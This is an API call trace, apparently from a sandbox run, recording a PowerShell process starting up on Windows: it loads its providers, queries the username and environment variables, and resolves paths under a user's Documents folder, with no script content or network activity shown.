	[0212.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.984] CoTaskMemAlloc (cb=0x804) returned 0x1b891e10
	[0212.984] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b891e10, nSize=0x1dd278 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1dd278) returned 0x1
	[0212.984] CoTaskMemFree (pv=0x1b891e10) 
	[0212.985] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0212.985] GetUserNameW (in: lpBuffer=0x408e50, pcbBuffer=0x1dd2b8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1dd2b8) returned 1
	[0212.985] CoTaskMemFree (pv=0x408e50) 
	[0212.985] ReportEventW (hEventLog=0x2780008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d6f970*="Function", lpRawData=0x2d6f700) returned 1
	[0213.038] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0213.038] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.038] CoTaskMemFree (pv=0x3c3ba0) 
	[0218.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0218.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0218.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0218.365] CoTaskMemAlloc (cb=0x804) returned 0x1b892e10
	[0218.365] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b892e10, nSize=0x1dd278 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1dd278) returned 0x1
	[0218.365] CoTaskMemFree (pv=0x1b892e10) 
	[0218.365] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0218.365] GetUserNameW (in: lpBuffer=0x408e50, pcbBuffer=0x1dd2b8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1dd2b8) returned 1
	[0218.366] CoTaskMemFree (pv=0x408e50) 
	[0218.366] ReportEventW (hEventLog=0x2780008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2da1cf8*="Registry", lpRawData=0x2da1a88) returned 1
	[0218.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0218.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0218.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0218.825] CoTaskMemAlloc (cb=0x804) returned 0x1b892e10
	[0218.825] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b892e10, nSize=0x1dd278 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1dd278) returned 0x1
	[0218.825] CoTaskMemFree (pv=0x1b892e10) 
	[0218.825] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0218.825] GetUserNameW (in: lpBuffer=0x408e50, pcbBuffer=0x1dd2b8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1dd2b8) returned 1
	[0218.825] CoTaskMemFree (pv=0x408e50) 
	[0218.826] ReportEventW (hEventLog=0x2780008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2da70c0*="Variable", lpRawData=0x2da6e50) returned 1
	[0218.919] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0218.919] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.919] CoTaskMemFree (pv=0x3c3ba0) 
	[0218.921] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0218.921] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.922] CoTaskMemFree (pv=0x3c3ba0) 
	[0218.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1dcb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0218.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1dca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0218.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1dca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0218.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1dca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0220.365] CoTaskMemAlloc (cb=0x804) returned 0x1b892e10
	[0220.365] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b892e10, nSize=0x1dd278 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1dd278) returned 0x1
	[0220.984] CoTaskMemFree (pv=0x1b892e10) 
	[0220.984] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0220.984] GetUserNameW (in: lpBuffer=0x408e50, pcbBuffer=0x1dd2b8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1dd2b8) returned 1
	[0220.985] CoTaskMemFree (pv=0x408e50) 
	[0220.985] ReportEventW (hEventLog=0x2780008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dbac88*="Certificate", lpRawData=0x2dbaa18) returned 1
	[0221.559] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0221.559] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.559] CoTaskMemFree (pv=0x3c3ba0) 
	[0221.562] GetLogicalDrives () returned 0x4
	[0221.562] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1dcf00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0221.562] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0221.563] CoTaskMemAlloc (cb=0x20e) returned 0x1b873dd0
	[0221.563] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b873dd0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0221.563] CoTaskMemFree (pv=0x1b873dd0) 
	[0221.565] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0221.565] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.565] CoTaskMemFree (pv=0x3c3ba0) 
	[0221.565] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0221.565] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.565] CoTaskMemFree (pv=0x3c3ba0) 
	[0221.581] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0221.581] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.581] CoTaskMemFree (pv=0x3c3ba0) 
	[0221.586] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0221.586] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.586] CoTaskMemFree (pv=0x3c3ba0) 
	[0221.587] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1dcc60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0221.587] SetErrorMode (uMode=0x1) returned 0x1
	[0221.587] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x1dcec0 | out: lpFileInformation=0x1dcec0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0221.588] SetErrorMode (uMode=0x1) returned 0x1
	[0221.588] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1dcc60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0221.588] SetErrorMode (uMode=0x1) returned 0x1
	[0221.588] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x1dcec0 | out: lpFileInformation=0x1dcec0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0221.588] SetErrorMode (uMode=0x1) returned 0x1
	[0221.589] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0221.589] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.589] CoTaskMemFree (pv=0x3c3ba0) 
	[0222.200] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1dce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.203] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1dcc70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0222.203] SetErrorMode (uMode=0x1) returned 0x1
	[0222.203] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1dce80 | out: lpFileInformation=0x1dce80*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.203] SetErrorMode (uMode=0x1) returned 0x1
	[0222.203] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1dcc70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0222.203] SetErrorMode (uMode=0x1) returned 0x1
	[0222.203] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1dce80 | out: lpFileInformation=0x1dce80*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.203] SetErrorMode (uMode=0x1) returned 0x1
	[0222.203] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1dcc80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0222.203] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1dcb70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0222.204] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1dcc70, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.204] SetErrorMode (uMode=0x1) returned 0x1
	[0222.204] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1dce80 | out: lpFileInformation=0x1dce80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0222.204] SetErrorMode (uMode=0x1) returned 0x1
	[0222.204] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1dcc70, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.204] SetErrorMode (uMode=0x1) returned 0x1
	[0222.204] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1dce80 | out: lpFileInformation=0x1dce80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0222.204] SetErrorMode (uMode=0x1) returned 0x1
	[0222.204] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1dcc80, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.204] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x1dcb70, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.204] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x1dcc70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.204] SetErrorMode (uMode=0x1) returned 0x1
	[0222.205] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x1dce80 | out: lpFileInformation=0x1dce80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.205] SetErrorMode (uMode=0x1) returned 0x1
	[0222.205] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x1dcc70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.205] SetErrorMode (uMode=0x1) returned 0x1
	[0222.205] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x1dce80 | out: lpFileInformation=0x1dce80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.205] SetErrorMode (uMode=0x1) returned 0x1
	[0222.205] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x1dcc80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.205] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x1dcb70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.205] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1dcc70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.205] SetErrorMode (uMode=0x1) returned 0x1
	[0222.205] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x1dce80 | out: lpFileInformation=0x1dce80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.205] SetErrorMode (uMode=0x1) returned 0x1
	[0222.205] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1dcc70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.206] SetErrorMode (uMode=0x1) returned 0x1
	[0222.206] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x1dce80 | out: lpFileInformation=0x1dce80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.206] SetErrorMode (uMode=0x1) returned 0x1
	[0222.206] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1dcc80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.206] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\.", nBufferLength=0x105, lpBuffer=0x1dcb70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.206] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1dccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.206] SetErrorMode (uMode=0x1) returned 0x1
	[0222.206] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1dcec0 | out: lpFileInformation=0x1dcec0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0222.206] SetErrorMode (uMode=0x1) returned 0x1
	[0222.206] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1dccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.206] SetErrorMode (uMode=0x1) returned 0x1
	[0222.207] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1dcec0 | out: lpFileInformation=0x1dcec0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0222.207] SetErrorMode (uMode=0x1) returned 0x1
	[0222.207] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1dccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.207] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x1dcbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.207] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x1dccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.207] SetErrorMode (uMode=0x1) returned 0x1
	[0222.207] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x1dcec0 | out: lpFileInformation=0x1dcec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.207] SetErrorMode (uMode=0x1) returned 0x1
	[0222.207] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x1dccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.207] SetErrorMode (uMode=0x1) returned 0x1
	[0222.207] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x1dcec0 | out: lpFileInformation=0x1dcec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.207] SetErrorMode (uMode=0x1) returned 0x1
	[0222.207] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x1dccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.208] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x1dcbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.208] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1dccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.208] SetErrorMode (uMode=0x1) returned 0x1
	[0222.208] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x1dcec0 | out: lpFileInformation=0x1dcec0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.208] SetErrorMode (uMode=0x1) returned 0x1
	[0222.208] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1dccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.208] SetErrorMode (uMode=0x1) returned 0x1
